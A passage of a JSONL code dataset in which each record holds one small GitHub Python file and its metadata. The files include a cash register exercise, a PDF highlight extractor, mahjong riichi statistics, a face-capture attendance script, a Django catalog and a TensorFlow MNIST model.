input(\"個数を入力してください=>\")\n if (order.exist_item_master(order_code) == False):\n print(\"マスタに存在しません、再度商品コードを入力してください\")\n continue\n\n order.add_item_order(order_code,quantity)\n\n # オーダー表示\n order.view_item_list()\n\n # 合計金額表示\n order.total_order()\n\n while True:\n # 支払金額を入力\n diposit = input(\"支払金額を入力してください=>\")\n isMinus = order.check_payment(diposit)\n\n if isMinus == True:\n print(\"金額が不足していますので、再度お支払いください\")\n continue\n else:\n order.payment()\n break\n\nif __name__ == \"__main__\":\n main()","repo_name":"KAZURYAN/python-study-0","sub_path":"study_four/kadai6.py","file_name":"kadai6.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8620165865","text":"import fitz\nfrom webcolors import rgb_to_name\nfrom scipy.spatial import KDTree\nfrom webcolors import (\n CSS3_HEX_TO_NAMES,\n hex_to_rgb,\n)\n\n\ndef main():\n doc = fitz.open(\"sample.pdf\")\n print(len(doc))\n # List to store all the highlighted texts\n highlight_text = []\n for pageNumber in range(0, len(doc)):\n page = doc[pageNumber]\n highlights = []\n\n annot = page.firstAnnot\n while annot:\n if annot.type[0] == 8:\n colours = annot.colors\n print(colours)\n if len(colours.get('stroke')) == 3:\n rgb = [round(x * 250) for x in colours.get('stroke')]\n # named_colour = rgb_to_name(rgb, spec='css3')\n named_colour = convert_rgb_to_names(rgb)\n print(named_colour)\n highlights.append((annot.rect, named_colour))\n annot = annot.next\n #\n all_words = page.get_text_words()\n for h in highlights:\n sentence = []\n for word in all_words:\n if fitz.Rect(word[0:4]).intersects(h[0]):\n if not sentence:\n first_word_number = word[7]\n sentence.append(word[4])\n last_word_number = word[7]\n highlight_text.append((\" \".join(sentence), h[1], first_word_number, last_word_number))\n print_text(highlight_text)\n\n\ndef convert_rgb_to_names(rgb_tuple):\n # a dictionary of all the hex and their respective names in css3\n css3_db = CSS3_HEX_TO_NAMES\n names = []\n rgb_values = []\n for color_hex, color_name in css3_db.items():\n names.append(color_name)\n rgb_values.append(hex_to_rgb(color_hex))\n\n kdt_db = 
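`main()` in the register program above opens item_master.csv, skips the header row by hand, and never closes the handle. A sketch of the same load using csv.DictReader and a context manager; the column names and the dataclass stand-in for Item are assumptions, since the CSV file itself is not in the record:

import csv
from dataclasses import dataclass

@dataclass
class Item:
    item_code: str
    item_name: str
    price: str

def load_item_master(path):
    # DictReader consumes the header automatically and keys each row by name.
    with open(path, newline='', encoding='utf-8') as f:
        return [Item(row['item_code'], row['item_name'], row['price'])
                for row in csv.DictReader(f)]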
KDTree(rgb_values)\n distance, index = kdt_db.query(rgb_tuple)\n return names[index]\n\n\ndef print_text(highlighted_text):\n with open('output.txt', 'w') as output:\n for sentence in highlighted_text:\n colour = sentence[1]\n if colour == 'khaki':\n output.write(\"-\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n elif colour == 'tomato':\n output.write(\" -\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n elif colour == 'plum':\n output.write(\" -\" + sentence[0] + \" \" + str(sentence[2]) + \" \" + str(sentence[3]) + \"\\n\")\n\n# def sort_notes(highlighted_text):\n# for sentence in highlighted_text:\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tjirmaine/pdf_Summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35334467096","text":"#########################################\n# camera_module.py #\n# MANSEDS Self-Landing Rocket Code #\n# Contributors: Matthew Asker #\n# Uses data written to a file from #\n# barometer to indicate when to start #\n# and stop recording using the PiCamera #\n#########################################\n\nimport picamera # imports module from picamera needed\nimport time\n\nrecording = 0 # a boolean variable to be set to 0 when camera is not recording and 1 when camera is recording\n\nwith picamera.PiCamera() as camera:\n\n camera.resolution = (640,480)\n\n while True:\n\n f = open('video_start.txt','r') # create an object f containing the file written to by the barometer\n start = f.read() # reads the text from the file and stores in start\n \n print(start)\n f.close();\n\n if start == \"Going down!\\n\" and recording == 0: # if the rocket is travelling downwards and recording has not yet been started\n camera.start_recording('video.h264') # uses PiCamera method for camera object to start recording\n recording = 1 # indicate that recording is started\n elif start == \"The rocket has landed!\\n\" and recording == 1: # if the rocket is stationary then it has landed\n camera.stop_recording() # uses PiCamera method for camera object to stop recording\n time.sleep(2)\n","repo_name":"MANSEDS/Rocketry-2018-2nd-Stage","sub_path":"camera_module_depreciated.py","file_name":"camera_module_depreciated.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8858066841","text":"from .log_hand_analyzer import LogHandAnalyzer\nfrom collections import defaultdict, Counter\nimport util.analysis_utils as ut\nimport util.shanten as sh\nfrom lxml import etree\nimport pandas as pd\n\n# Discard reading from the Riichi tile, for first riichi\n# Turn? Tedashi or tsumogiri?\n# Safe tile, terminal, 28, middle tile or dora? 
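A standalone version of the nearest-CSS3-colour lookup from the PDF highlight extractor above, building the KDTree once instead of per call. One detail worth flagging: PyMuPDF reports stroke colours as floats in [0, 1], so the scale factor should be 255 rather than the 250 used in the record, which skews every channel slightly before the nearest-neighbour query.

from scipy.spatial import KDTree
from webcolors import CSS3_HEX_TO_NAMES, hex_to_rgb

_names = list(CSS3_HEX_TO_NAMES.values())
_tree = KDTree([hex_to_rgb(h) for h in CSS3_HEX_TO_NAMES])

def nearest_css3_name(stroke_floats):
    # Scale the 0..1 floats to the 0..255 range the CSS3 table uses.
    rgb = [round(c * 255) for c in stroke_floats]
    _, index = _tree.query(rgb)
    return _names[index]

print(nearest_css3_name((1.0, 1.0, 0.0)))  # -> 'yellow'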
What about safe tile after dropping a joint?\n# What if the tile is connected to something in the discards?\n\noutput = \"./results/RiichiTile.csv\"\njoints = [(1,1), (2,2), (3,3), (4,4), (5,5), # Pair Drop \n (1,2), (2,1), (2,4), (4,2), (1,3), (3,1), (3,5), (5,3), # Kanchan Drop\n (2,3), (3,2), (3,4), (4,3), (4,5), (5,4)] # Ryanmen Drop\ncombos = [(1,7), (7,1), (2,8), (1,9), # 6 gap and 7 gap for good measure\n (1,6), (6,1), (2,7), (7,2), # Aida yon ken\n (1,4), (4,1), (2,5), (5,2), (3,6), (6,3)] # Suji drop\n\nclass RiichiTile(LogHandAnalyzer):\n def __init__(self):\n super().__init__()\n self.hand_before = None\n self.tedashi = [[], [], [], []]\n\n self.riichitile_correlation_df = pd.DataFrame(0,index=[1,2,3,4,5,6,7,8,9],columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"count\"]) #Given riichi on X, chance Y is in the discards\n self.riichitile_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_jointdrop_df = pd.DataFrame(0,index = joints,\n columns = [1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X2 and X1 in discards, relative danger of tiles\n self.riichitile_combos_df = pd.DataFrame(0,index = combos,\n columns = [1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X2 and X1 in discards, relative danger of tiles\n self.riichitile_urawait_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[\"matagisuji\", \"urasuji\",\"urakanchan\",\"uratanki\",\"urashanpon\",\"uracomplex\", \"not ura\", \"count\"]) #Chance of type of wait around riichi tile, given riichi tile\n self.turn_urawait_df = pd.DataFrame(0, index = range(0,18), columns=[\"matagisuji\", \"urasuji\",\"urakanchan\", \"uratanki\",\"urashanpon\",\"uracomplex\", \"not ura\", \"count\"]) #Chance of type of wait around riichi tile, given turn\n self.riichitile_firstrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_secondrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n self.riichitile_thirdrow_df = pd.DataFrame(0, index = [1,2,3,4,5,6,7,8,9], columns=[1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,\"Honor\",\"count\"]) #Given riichi on X, relative danger of Y\n\n def RoundStarted(self, init):\n self.tedashi = [[], [], [], []]\n return super().RoundStarted(init)\n \n def TileDiscarded(self, who, tile, tsumogiri, element):\n self.tedashi[who].append(not tsumogiri)\n super().TileDiscarded(who, tile, tsumogiri, element)\n\n def RiichiCalled(self, who, step, element):\n if step == 1:\n self.hand_before = self.hands[who].copy()\n self.hand_before[self.last_draw[who]] -= 1\n\n if step == 2:\n if self.turn > 17:\n self.end_round = True\n return\n \n ### Discard pool\n discarded_joints = []\n for i in range(len(self.discards[who])):\n d = self.discards[who][i]\n if d > 30: continue\n if d % 10 <= 5: \n for j in joints:\n if j in discarded_joints: continue\n if j[0] == d % 10:\n for ii in range(i+1, len(self.discards[who])-1): # Attempt to find other side of the joint\n dd = self.discards[who][ii]\n if j[1] == dd % 10 and d // 10 == dd // 10 and self.tedashi[who][ii]: # Joint found.\n discarded_joints.append(j)\n\n ### Before riichi\n hand_before_shanten = 
sh.calculateMinimumShanten(self.hand_before)\n uke_before, wait_before = sh.calculateUkeire(self.hand_before, baseShanten=hand_before_shanten)\n shape_before = ut.GroupShanten(hand_before_shanten, uke_before)\n\n ### Wait\n hand = self.hands[who]\n uke, wait = sh.calculateWait(hand)\n wait_class = WaitClass(uke, wait, hand)\n\n tanyao = True\n for tile in hand:\n if hand[tile] > 0:\n if tile % 10 == 1 or tile % 10 == 9 or tile > 30:\n tanyao = False\n break\n\n ## Dora & Dora discarded\n aka_drawn = [i*10 + 5 for i, x in enumerate(self.aka) if x == who]\n aka = []\n aka_discarded = []\n for a_d in aka_drawn:\n if hand[a_d] > 0:\n aka.append(a_d)\n else:\n aka_discarded.append(a_d)\n\n dora = 0\n dora_discarded = 0\n for d in self.dora:\n dora += hand[d]\n dora_discarded += self.discards[who].count(d)\n\n dsoba_wait = False\n for w in wait:\n for d in self.dora:\n if w // 10 == d // 10:\n if w >= d-2 and w <= d+2:\n dsoba_wait = True\n break\n\n ### Riichi tile\n riichi_tile = self.discards[who][-1]\n riichi_tile_class = RiichiTileClass(riichi_tile, self.dora, aka_discarded)\n ura_wait_class = UraWaitSorter(riichi_tile, wait, wait_class)\n tsumogiri = self.discards[who][-1] == self.last_draw[who]\n\n # First joint that is +- 2 of riichi tile \n riichi_joint = []\n if riichi_tile < 30 and riichi_tile % 10 <= 5:\n for i in range(len(self.discards[who])-1,-1,-1):\n d = self.discards[who][i]\n if d > 30: continue\n if d % 10 <= 5: \n for j in joints:\n if j[0] == d % 10:\n if j[1] == riichi_tile % 10 and d // 10 == riichi_tile // 10 and not tsumogiri: # Joint found.\n riichi_joint.append(j)\n break\n\n riichi_combos = []\n if riichi_tile < 30:\n for i in range(len(self.discards[who])-1):\n d = self.discards[who][i]\n if d > 30: continue\n for c in combos:\n if c[0] == d % 10:\n if c[1] == riichi_tile % 10 and d // 10 == riichi_tile // 10 and not tsumogiri: # Joint found.\n riichi_combos.append(c)\n\n ### Record data\n if riichi_tile < 30 and self.turn <= 6:\n self.riichitile_firstrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_firstrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n elif riichi_tile < 30 and self.turn >= 12:\n self.riichitile_thirdrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_thirdrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n elif riichi_tile < 30:\n self.riichitile_secondrow_df.loc[riichi_tile%10, \"count\"] += 1\n for w in wait:\n if w > 30:\n waittile_class = \"Honor\"\n elif riichi_tile // 10 == w // 10:\n waittile_class = w % 10\n else:\n waittile_class = w % 10 + 10 \n self.riichitile_secondrow_df.loc[riichi_tile%10, waittile_class] += 1\n\n if riichi_tile < 30:\n self.riichitile_urawait_df.loc[riichi_tile%10, ura_wait_class] += 1\n self.riichitile_urawait_df.loc[riichi_tile%10, \"count\"] += 1\n self.turn_urawait_df.loc[self.turn, ura_wait_class] += 1\n self.turn_urawait_df.loc[self.turn, \"count\"] += 1\n \n # Log\n # print(f\"Riichi turn {self.turn} Round {self.round[0]}\")\n # print(f\"Hand before: {ut.parseAmberNotation(self.hand_before)}, Shanten/Shape: {shape_before}, Drawn tile: {ut.parseAmberNotation(list=[self.last_draw[who]])}\")\n # print(f\"Discards: {ut.parseAmberNotation(list=self.discards[who])}\")\n # 
print(f\"Tenpai: {ut.parseAmberNotation(hand)}, Riichi on: {ut.parseAmberNotation(list=[riichi_tile])}, Class: {riichi_tile_class}, Tsumogiri: {tsumogiri}\")\n # print(f\"Wait on: {ut.parseAmberNotation(list=wait)}, Ura Wait class: {ura_wait_class}, Tanyao: {tanyao}\")\n # print(f\"Dora: {ut.parseAmberNotation(list=self.dora)}, Have # dora: {dora}, Have # aka: {ut.parseAmberNotation(list=aka)}, Dorasoba wait: {dsoba_wait}\")\n # print(f\"Aka discarded: {aka_discarded}, Dora discarded: {dora_discarded}\")\n # input()\n\n self.end_round = True\n\n def PrintResults(self):\n self.riichitile_firstrow_df.to_csv(output, mode='a', index_label='first row')\n self.riichitile_secondrow_df.to_csv(output, mode='a', index_label='second row')\n self.riichitile_thirdrow_df.to_csv(output, mode='a', index_label='third row')\n\n with open(output, \"a\", encoding=\"utf8\") as f:\n f.write(f\"Total riichi count,{self.riichi_counts}\\n\")\n f.write(f\"Total riichi tanyao,{self.riichi_tanyao}\\n\")\n f.write(f\"Total riichi dorawait,{self.riichi_dorawait}\\n\")\n f.write(f\"Total riichi turn,{self.riichi_turn}\\n\")\n\n\ndef WaitClass(uke, wait, hand):\n if len(wait) == 1:\n if wait[0] < 30:\n if hand[wait[0]]>0 and hand[wait[0]-1] + hand[wait[0]+1] < 3: #Cases where you have the tile and waiting on it, but it's kanchan eg 22344, 12234\n return \"tanki\"\n else:\n return \"kanchan\"\n else:\n return \"tanki\"\n\n if len(wait) == 2:\n if all(i//10 == wait[0]//10 for i in wait) and wait[0] + 3 == wait[1] and uke >= 5:\n return \"ryanmen\"\n else:\n if uke > 4:\n return \"complex\"\n else:\n return \"shanpon\"\n \n if len(wait) == 3:\n if all(i//10 == wait[0]//10 for i in wait) and wait[0] + 3 == wait[1] and wait[1] + 3 == wait[2]:\n return \"sanmenchan\"\n \n if len(wait) >= 3:\n return \"complex\"\n\ndef RiichiTileClass(tile, dora, aka_discarded):\n if tile in aka_discarded: \n return \"Aka\"\n if tile in dora:\n return \"Dora\"\n if tile > 30:\n return \"Honor\"\n if tile % 10 == 1 or tile % 10 == 9:\n return \"19\"\n if tile % 10 == 2 or tile % 10 == 8:\n return \"28\"\n else:\n return \"34567\"\n \ndef TsumogiriSorter(hand, uke, wait, wait_class, tanyao, who, round, oya):\n if wait_class == \"tanki\":\n return \"tanki\"\n \n #Check for sanshoku. At least 2 of 3 sanshokus present & 2 of the other tile\n for i in range(1,8):\n set = 0\n joint = 0\n for j in range(3):\n count = 0\n if hand[j*10+i] > 0:\n count += 1\n if hand[j*10+i+1] > 0:\n count += 1\n if hand[j*10+i+2] > 0:\n count += 1\n if count == 3:\n set += 1\n if count == 2:\n joint += 1\n if set + joint == 3 and set >= 1:\n return \"sanshoku\"\n \n #Check for san/suuankou chance. 
2 triplets present.\n triplets = 0\n for i in range(38):\n if hand[i] >= 3:\n triplets += 1\n if triplets >= 2:\n return \"sanankou\"\n \n #Tanyao/iipeikou bad wait, too hard to check for pinfu\n if tanyao:\n return \"tanyao\"\n if len(wait) == 1:\n if hand[wait[0]-1] >= 2 and hand[wait[0]] >= 1 and hand[wait[0]+1] >= 2: #Common 33455 bad wait ippeikou\n return \"iipeikou\"\n \n #Yakuhai triplet or pair\n for i in range(31,38):\n if isYakuhai(i, who, round, oya):\n if hand[i] == 3:\n return \"yakuhai triplet\"\n if hand[i] == 2:\n return \"yakuhai pair\"\n\n if (wait_class == \"ryanmen\" or wait_class == \"sanmenchan\") and triplets == 0:\n return \"pinfu\" #Good wait probably pinfu, bad wait probably no yaku\n else:\n return \"no yaku\"\n \ndef isYakuhai(tile, who, round, oya):\n yaku = 0\n if tile >= 35:\n yaku += 1\n if round <= 3 and tile == 31:\n yaku += 1\n if round >= 4 and tile == 32:\n yaku += 1\n\n if tile - ((who-oya)%4) == 31:\n yaku += 1\n\n return yaku\n\ndef UraWaitSorter(riichi_tile, wait, wait_class):\n if wait_class == \"tanki\":\n if wait[0] // 10 == riichi_tile // 10:\n if wait[0] <= riichi_tile + 2 and wait[0] >= riichi_tile - 2:\n return \"uratanki\"\n elif wait_class == \"shanpon\":\n for w in wait:\n if w // 10 == riichi_tile // 10:\n if w <= riichi_tile + 2 and w >= riichi_tile - 2:\n return \"urashanpon\"\n elif wait_class == \"complex\":\n for w in wait:\n if w // 10 == riichi_tile // 10:\n if w <= riichi_tile + 2 and w >= riichi_tile - 2:\n return \"uracomplex\"\n elif wait_class == \"kanchan\":\n if wait[0] // 10 == riichi_tile // 10:\n if wait[0] <= riichi_tile + 2 and wait[0] >= riichi_tile - 2:\n return \"urakanchan\"\n else:\n if wait[0] < riichi_tile and wait[-1] > riichi_tile:\n return \"matagisuji\"\n if wait[0] == riichi_tile + 1 or wait[-1] == riichi_tile - 1:\n return \"urasuji\"\n return \"not ura\"","repo_name":"chienshyong/houou-statistics","sub_path":"analyzers/riichi_tile.py","file_name":"riichi_tile.py","file_ext":"py","file_size_in_byte":14929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72771483090","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 26 00:03:51 2019\r\n\r\n@author: kartik\r\n\"\"\"\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport sqlite3\r\n\r\nfaceDetector = cv2.CascadeClassifier(\"C:\\\\Users\\\\kartik\\\\Anaconda3\\\\Lib\\\\site-packages\\\\cv2\\\\data\\\\haarcascade_frontalface_default.xml\");\r\nname=input(\"enter your name\")\r\nroll=input(\"enter your roll num\")\r\nconn=sqlite3.connect(\"f.db\")\r\np=(name, roll)\r\ncursor=conn.execute(\"INSERT INTO attendace VALUES (?, ?, NULL)\", p)\r\n\r\nconn.commit()\r\n\r\nos.mkdir('D://PROG//dataset//{}'.format(name))\r\nk=0\r\ncap = cv2.VideoCapture(0);\r\n\r\nwhile(True):\r\n _, frame = cap.read();\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceDetector.detectMultiScale(gray, 1.2, 5)\r\n for(x, y, w, h) in faces:\r\n cv2.imwrite('D://PROG//dataset//{}//{}.jpg'.format(name,k),image)\r\n k +=1\r\n cv2.rectangle(frame, (x,y), (x+w, y+h), (0,255,0), 2)\r\n print (len(faces))\r\n cv2.imshow(\"Face\", frame)\r\n if(cv2.waitKey(1)== ord('q')):\r\n break\r\n \r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"kartikmalhotra/Attendence-Monitoring-System","sub_path":"atten1.py","file_name":"atten1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
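The face-capture record above writes `cv2.imwrite(..., image)`, but `image` is never defined anywhere in the file, so the first detected face raises NameError; the grayscale face crop was presumably intended. A minimal corrected core of that loop, with the hard-coded Windows cascade path generalised via cv2.data.haarcascades and a fixed sample count added purely for the demo:

import cv2

cap = cv2.VideoCapture(0)
detector = cv2.CascadeClassifier(
    cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
k = 0
while k < 20:                          # stop after 20 samples for the demo
    ok, frame = cap.read()
    if not ok:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    for (x, y, w, h) in detector.detectMultiScale(gray, 1.2, 5):
        # Save the detected face region itself, not an undefined variable.
        cv2.imwrite('dataset/{}.jpg'.format(k), gray[y:y+h, x:x+w])
        k += 1
cap.release()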
+{"seq_id":"1658712097","text":"from django.shortcuts import render, redirect\nfrom .models import Phone\n\n\ndef index(request):\n return redirect('catalog')\n\n\ndef show_catalog(request):\n template = 'catalog.html'\n phones = list(Phone.objects.all())\n if request.GET:\n if request.GET['sort'] == 'name':\n phones.sort(key=lambda x: x.name)\n if request.GET['sort'] == 'min_price':\n phones.sort(key=lambda x: x.price)\n if request.GET['sort'] == 'max_price':\n phones.sort(reverse=True|False, key=lambda x: x.price)\n context = {'phones': phones}\n return render(request, template, context)\n\n\ndef show_product(request, slug):\n template = 'product.html'\n phone = Phone.objects.get(slug=slug)\n context = {'phone': phone}\n return render(request, template, context)\n","repo_name":"kxrxll/dj-orm","sub_path":"phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42459682673","text":"# -*- coding: utf-8 -*-\n\n\"\"\"A class to load training triples and convert them to a TriplesFactory object that\ncan be used by PyKEEN.\"\"\"\n\nfrom typing import Tuple\nimport numpy as np\nimport pandas as pd\nfrom pathlib import Path\nimport pickle\n\nfrom pykeen.triples import TriplesFactory\n\nfrom .triples_numeric_literals_factory import TriplesNumericLiteralsFactory\n\n\nclass DataLoader:\n def __init__(self, triples_dir: Path, use_features: str) -> None:\n self.triples_dir = triples_dir\n self.use_features = use_features\n self.load_metadata()\n return\n\n def load_metadata(self) -> None:\n with open(f\"{self.triples_dir}/metadata.pkl\", \"rb\") as f:\n metadata = pickle.load(f)\n for key, value in metadata.items():\n setattr(self, key, value)\n return\n\n def get_triples_factory(self) -> TriplesFactory:\n df = pd.DataFrame(np.load(Path(self.triples_dir) / \"triplets.npy\"))\n if self.use_features == \"categorical\":\n mask = df[\"rel\"] >= self.n_num_attr\n df = df[mask]\n df = df.astype(np.int64)\n elif self.use_features == \"numerical\":\n mask = df[\"rel\"] < self.n_num_attr\n df = df[mask]\n tf = TriplesFactory(df.to_numpy(), self.entity_to_idx, self.rel_to_idx)\n tf.n_num_rel = self.n_num_attr\n return tf\n\n def get_numeric_triples_factory(self) -> TriplesNumericLiteralsFactory:\n \"\"\"Only used with DistMult + LiteralE\"\"\"\n df = pd.DataFrame(np.load(Path(self.triples_dir) / \"triplets.npy\"))\n assert self.use_features == \"all\"\n mask = df[\"rel\"] >= self.n_num_attr\n triples, num_triples = df[mask].to_numpy(dtype=np.int64), df[~mask].to_numpy()\n triples[:, 1] -= self.n_num_attr\n non_num_rels = list(self.rel_to_idx.keys())[self.n_num_attr :]\n num_rels = list(self.rel_to_idx.keys())[:self.n_num_attr]\n non_num_rel_to_idx = {rel: idx for idx, rel in enumerate(non_num_rels)}\n num_rel_to_idx = {rel: idx for idx, rel in enumerate(num_rels)}\n tf = TriplesFactory(triples, self.entity_to_idx, non_num_rel_to_idx)\n num_tf = TriplesNumericLiteralsFactory(\n triples_factory=tf,\n numeric_triples=num_triples,\n num_rel_to_idx=num_rel_to_idx,\n )\n return num_tf\n\n def get_hrt(self) -> Tuple[np.array]:\n df = np.load(Path(self.triples_dir) / \"triplets.npy\")\n return df[\"head\"], df[\"rel\"], df[\"tail\"]\n\n def get_dataframe(self) -> pd.DataFrame:\n df = np.load(Path(self.triples_dir) / \"triplets.npy\")\n df = pd.DataFrame.from_records(df)\n if self.use_features == \"categorical\":\n mask = df[\"rel\"] >= self.n_num_attr\n df = df[mask]\n df = 
df.astype(np.int64)\n return df\n","repo_name":"alexis-cvetkov/KEN","sub_path":"KEN/dataloader/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"15577089523","text":"#!/usr/bin/env python\n# Following the tutorial from\n# https://www.tensorflow.org/get_started/mnist/pros\nimport datetime\nimport random\nimport math\nimport gzip\n\nimport tensorflow as tf\nfrom tensorflow import flags\nfrom tensorflow.contrib import learn\nimport tensorflow.contrib.image\nfrom tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import errors as tferrors\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.framework import ops\nimport numpy as np\nfrom scipy import ndimage\n\nimport process_data\n\nimage_vector_distort = tf.load_op_library('bin/image_vector_distort.so')\n\nFLAGS = flags.FLAGS\nflags.DEFINE_bool('train', False, 'Train model. Evaluates if false.')\nflags.DEFINE_integer('epochs', 15, 'Number of steps to train.')\nflags.DEFINE_bool(\n 'clean', True,\n 'Train new model from scratch instead of improving existing model.')\nflags.DEFINE_bool('summaries', False, 'Log detailed image summaries.')\n\n# Model parameters.\nflags.DEFINE_integer('columns', 7, 'Columns in multi-column convnet.')\nflags.DEFINE_bool('dropout', True, 'Enable dropout in training.')\n\n# Enable normal logging.\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ndef with_dependencies(dependencies, op):\n \"\"\"Returns `op` with dependencies added.\n\n Arguments:\n dependencies: List of tensorflow ops.\n op: Tensorflow op.\n \"\"\"\n with tf.control_dependencies(dependencies):\n return tf.identity(op)\n\n\ndef conv_pool_layer(\n inputs,\n filters,\n conv_padding='valid', # no padding\n conv_sample_size=5, # Convolve size\n pool_size=2,\n name=None):\n \"\"\"Convolve2D and max-pool layer.\"\"\"\n with tf.variable_scope(name):\n conv = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[conv_sample_size] * 2,\n padding=conv_padding,\n activation=tf.nn.relu,\n bias_initializer=tf.truncated_normal_initializer(stddev=0.1),\n name='conv')\n\n pool = tf.layers.max_pooling2d(\n inputs=conv,\n pool_size=[pool_size] * 2,\n strides=pool_size,\n padding='same',\n name='pool')\n\n return pool\n\n\ndef cnn_model_fn(features, labels, mode):\n \"\"\"Model definition.\"\"\"\n input_layer = tf.reshape(\n features['images'], [-1, 28, 28, 1], name='input/layer')\n\n input_layer = tf.image.resize_images(\n input_layer,\n [28, 28])\n\n # Conv-pool layers.\n conv_pool1 = conv_pool_layer(\n inputs=input_layer,\n filters=32,\n conv_sample_size=4,\n pool_size=2,\n name='conv_pool1') # Output 26x26x32 -> 13x13x32\n conv_pool2 = conv_pool_layer(\n inputs=conv_pool1,\n filters=64,\n conv_sample_size=5,\n pool_size=3,\n name='conv_pool2') # Output 9x9x64 -> 3x3x64\n\n # Final Fully/densely-connected layer\n conv_pool2_flat = tf.reshape(conv_pool2, [-1, 3 * 3 * 64])\n fc1 = tf.layers.dense(\n inputs=conv_pool2_flat,\n units=150,\n activation=tf.nn.relu,\n name='fc1')\n if FLAGS.dropout:\n dropout = tf.layers.dropout(\n inputs=fc1,\n rate=0.5,\n training=(mode == learn.ModeKeys.TRAIN),\n name='dropout')\n else:\n dropout = fc1\n\n # Final connected layer\n logits = 
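A toy round trip of the pattern `DataLoader` above relies on: triplets.npy holds a structured array with 'head'/'rel'/'tail' fields, which is wrapped in a DataFrame and split on the relation index. `n_num_attr = 2` is an arbitrary value chosen for the demo:

import numpy as np
import pandas as pd

triples = np.array([(0, 0, 1), (0, 3, 2), (1, 1, 3)],
                   dtype=[('head', 'i8'), ('rel', 'i8'), ('tail', 'i8')])
df = pd.DataFrame.from_records(triples)

n_num_attr = 2
categorical = df[df['rel'] >= n_num_attr].astype(np.int64)  # relations past the numeric block
numerical = df[df['rel'] < n_num_attr]                      # numeric-attribute triples
print(len(categorical), len(numerical))                     # -> 1 2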
tf.layers.dense(dropout, units=10, name='logits')\n\n loss = None\n train_op = None\n\n # Configure loss function.\n if mode != learn.ModeKeys.INFER:\n onehot_labels = tf.one_hot(labels, depth=10)\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n\n # Training op\n if mode == learn.ModeKeys.TRAIN:\n train_op = tf.contrib.layers.optimize_loss(\n loss=loss,\n global_step=tf.contrib.framework.get_global_step(),\n learning_rate=0.001,\n optimizer=tf.train.AdamOptimizer)\n tf.summary.scalar('loss', loss)\n\n # Predict values.\n predictions = {\n 'classes': tf.argmax(logits, axis=1, name='classes'),\n 'probabilities': tf.nn.softmax(logits, name='softmax_tensor'),\n }\n\n return model_fn_lib.ModelFnOps(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op\n )\n\ndef main(unused_argv):\n \"\"\"Load data and train.\"\"\"\n # Read MNIST data.\n with open('MNIST_data/train-images-processed', 'rb') as file:\n train_data = process_data.read_images(file).astype(np.float32)\n with open('MNIST_data/train-labels-processed', 'rb') as file:\n train_labels = process_data.read_labels(file).astype(np.int32)\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': train_data},\n y=train_labels,\n batch_size=100,\n num_epochs=FLAGS.epochs,\n shuffle=True)\n\n with open('MNIST_data/t10k-images-processed', 'rb') as file:\n 